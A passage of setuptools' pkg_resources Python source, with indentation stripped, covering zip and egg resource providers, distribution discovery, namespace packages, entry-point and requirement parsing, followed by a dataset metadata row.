Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
_zip_manifests = MemoizedZipManifests()
def __init__(self, module):
EggProvider.__init__(self, module)
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.zip_pre)
)
def _parts(self, zip_path):
# Convert a zipfile subpath into an egg-relative path part list.
# pseudo-fs path
fspath = self.zip_pre+zip_path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.egg_root)
)
@property
def zipinfo(self):
return self._zip_manifests.load(self.loader.archive)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
# ymdhms+wday, yday, dst
date_time = zip_stat.date_time + (0, 0, -1)
# 1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
# return the extracted directory name
return os.path.dirname(last)
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp, timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
# Windows, del old file and retry
elif os.name=='nt':
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
# report a user-friendly error
manager.extraction_error()
return real_path
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size!=size or stat.st_mtime!=timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
with open(file_path, 'rb') as f:
file_contents = f.read()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self, fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self, fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.egg_root, resource_name))
def _resource_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self, path):
self.path = path
def has_metadata(self, name):
return name=='PKG-INFO'
def get_metadata(self, name):
if name=='PKG-INFO':
with open(self.path,'rU') as f:
metadata = f.read()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir, project_name=dist_name, metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
# don't yield nested distros
return
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item, entry, metadata, precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
dists = find_distributions(os.path.join(path_item, entry))
for dist in dists:
yield dist
elif not only and lower.endswith('.egg-link'):
with open(os.path.join(path_item, entry)) as entry_file:
entry_lines = entry_file.readlines()
for line in entry_lines:
if not line.strip():
continue
path = os.path.join(path_item, line.rstrip())
dists = find_distributions(path)
for item in dists:
yield item
break
register_finder(pkgutil.ImpImporter, find_on_path)
if importlib_bootstrap is not None:
register_finder(importlib_bootstrap.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer, path_entry, moduleName, module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = imp.new_module(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
for path_item in path:
if path_item not in module.__path__:
module.__path__.append(path_item)
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath:
fixup_namespace_packages(subpath, package)
finally:
imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
if importlib_bootstrap is not None:
register_namespace_handler(importlib_bootstrap.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename, _cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a string or sequence"""
if isinstance(strs, string_types):
for s in strs.splitlines():
s = s.strip()
# skip blank lines/comments
if s and not s.startswith('#'):
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
# whitespace and comment
LINE_END = re.compile(r"\s*(#.*)?$").match
# line continuation
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match
# Distribution or extra
DISTRO = re.compile(r"\s*((\w|[-.])+)").match
# ver. info
VERSION = re.compile(r"\s*(<=?|>=?|===?|!=|~=)\s*((\w|[-.*_!+])+)").match
# comma between items
COMMA = re.compile(r"\s*,").match
OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"(?P<name>[^-]+)"
r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
re.VERBOSE | re.IGNORECASE
).match
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, env=None, installer=None):
if require:
self.require(env, installer)
else:
warnings.warn(
"`require` parameter is deprecated. Use "
"EntryPoint._load instead.",
DeprecationWarning,
)
return self._load()
def _load(self):
module = __import__(self.module_name, fromlist=['__name__'], level=0)
try:
return functools.reduce(getattr, self.attrs, module)
except AttributeError as exc:
raise ImportError(str(exc))
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
reqs = self.dist.requires(self.extras)
items = working_set.resolve(reqs, env, installer)
list(map(working_set.add, items))
pattern = re.compile(
r'\s*'
r'(?P<name>[+\w. -]+?)\s*'
r'=\s*'
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1, extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
m = cls.pattern.match(src)
if not m:
msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
raise ValueError(msg, src)
res = m.groupdict()
extras = cls._parse_extras(res['extras'])
attrs = res['attr'].split('.') if res['attr'] else ()
return cls(res['name'], res['module'], attrs, extras, dist)
@classmethod
def _parse_extras(cls, extras_spec):
if not extras_spec:
return ()
req = Requirement.parse('x' + extras_spec)
if req.specs:
raise ValueError()
return req.extras
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name]=ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data, dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls, location, basename, metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
# .dist-info gets much metadata differently
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
cls = _distributionImpl[ext.lower()]
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
@property
def hashcmp(self):
return (
self.parsed_version,
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version,
self.platform,
)
def __hash__(self):
return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
if not hasattr(self, "_parsed_version"):
self._parsed_version = parse_version(self.version)
if isinstance(
self._parsed_version, packaging.version.LegacyVersion):
# While an empty version is techincally a legacy version and
# is not a valid PEP 440 version, it's also unlikely to
# actually come from someone and instead it is more likely that
# it comes from setuptools attempting to parse a filename and
# including it in the list. So for that we'll gate this warning
# on if the version is anything at all or not.
if self.version:
warnings.warn(
"'%s (%s)' is being parsed as a legacy, non PEP 440, "
"version. You may find odd behavior and sort order. "
"In particular it will be sorted as less than 0.0. It "
"is recommend to migrate to PEP 440 compatible "
"versions." % (
self.project_name, self.version,
),
PEP440Warning,
)
return self._parsed_version
@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata(self.PKG_INFO):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
tmpl = "Missing 'Version:' header and/or %s file"
raise ValueError(tmpl % self.PKG_INFO, self)
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra, reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
extra, marker = extra.split(':', 1)
if invalid_marker(marker):
# XXX warn
reqs=[]
elif not evaluate_marker(marker):
reqs=[]
extra = safe_extra(extra) or None
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
def requires(self, extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None, ()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self, name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self, path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None:
path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
for pkg in self._get_metadata('namespace_packages.txt'):
if pkg in sys.modules:
declare_namespace(pkg)
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-' + self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self, self.location)
else:
return str(self)
def __str__(self):
try:
version = getattr(self, 'version', None)
except ValueError:
version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name, version)
def __getattr__(self, attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls, filename, metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
if isinstance(self.parsed_version, packaging.version.Version):
spec = "%s==%s" % (self.project_name, self.parsed_version)
else:
spec = "%s===%s" % (self.project_name, self.parsed_version)
return Requirement.parse(spec)
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group, name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group, name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc = None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath= [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item == nloc:
break
elif item == bdir and self.precedence == EGG_DIST:
# if it's an .egg, give it precedence over its directory
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while True:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
# ha!
p = np
return
def check_version_conflict(self):
if self.key == 'setuptools':
# ignore the inevitable setuptools self-conflicts :(
return
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for " + repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
names = 'project_name version py_version platform location precedence'
for attr in names.split():
kw.setdefault(attr, getattr(self, attr, None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
metadata = self.get_metadata(self.PKG_INFO)
self._pkg_info = email.parser.Parser().parsestr(metadata)
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _preparse_requirement(self, requires_dist):
"""Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
Split environment marker, add == prefix to version specifiers as
necessary, and remove parenthesis.
"""
parts = requires_dist.split(';', 1) + ['']
distvers = parts[0].strip()
mark = parts[1].strip()
distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
distvers = distvers.replace('(', '').replace(')', '')
return (distvers, mark)
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
from _markerlib import compile as compile_marker
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
distvers, mark = self._preparse_requirement(req)
parsed = next(parse_requirements(distvers))
parsed.marker_fn = compile_marker(mark)
reqs.append(parsed)
def reqs_for_extra(extra):
for req in reqs:
if req.marker_fn(override={'extra':extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
extra = safe_extra(extra.strip())
dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': Distribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
warnings.warn(stacklevel=level + 1, *args, **kw)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be a string, or a (possibly-nested) iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM, TERMINATOR, line, p, groups, item_name):
items = []
while not TERMINATOR(line, p):
if CONTINUE(line, p):
try:
line = next(lines)
p = 0
except StopIteration:
raise ValueError(
"\\ must not appear on the last nonblank line"
)
match = ITEM(line, p)
if not match:
msg = "Expected " + item_name + " in"
raise ValueError(msg, line, "at", line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line, p)
if match:
# skip the comma
p = match.end()
elif not TERMINATOR(line, p):
msg = "Expected ',' or end-of-list in"
raise ValueError(msg, line, "at", line[p:])
match = TERMINATOR(line, p)
# skip the terminator, if any
if match:
p = match.end()
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise ValueError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line, p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION, LINE_END, line, p, (1, 2),
"version spec")
specs = [(op, val) for op, val in specs]
yield Requirement(project_name, specs, extras)
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
self.specifier = packaging.specifiers.SpecifierSet(
",".join(["".join([x, y]) for x, y in specs])
)
self.specs = specs
self.extras = tuple(map(safe_extra, extras))
self.hashCmp = (
self.key,
self.specifier,
frozenset(self.extras),
)
self.__hash = hash(self.hashCmp)
def __str__(self):
extras = ','.join(self.extras)
if extras:
extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, self.specifier)
def __eq__(self, other):
return (
isinstance(other, Requirement) and
self.hashCmp == other.hashCmp
)
def __contains__(self, item):
if isinstance(item, Distribution):
if item.key != self.key:
return False
item = item.version
# Allow prereleases always in order to match the previous behavior of
# this method. In the future this should be smarter and follow PEP 440
# more accurately.
return self.specifier.contains(item, prereleases=True)
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs) == 1:
return reqs[0]
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
class cls(cls, object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _bypass_ensure_directory(path, mode=0o777):
"""Sandbox-bypassing version of ensure_directory()"""
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(path)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, mode)
def split_sections(s):
"""Split a string or iterable thereof into (section, content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
def _mkstemp(*args,**kw):
old_open = os.open
try:
# temporarily bypass sandboxing
os.open = os_open
return tempfile.mkstemp(*args,**kw)
finally:
# and then put it back
os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one.
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# Set up global resource manager (deliberately not state-saved)
_manager = ResourceManager()
def _initialize(g):
for name in dir(_manager):
if not name.startswith('_'):
g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
working_set = WorkingSet._build_master()
_declare_state('object', working_set=working_set)
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
# backward compatibility
run_main = run_script
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]
# match order
list(map(working_set.add_entry, sys.path))
| apache-2.0 | 7,487,369,823,120,158,000 | 33.822111 | 82 | 0.592867 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.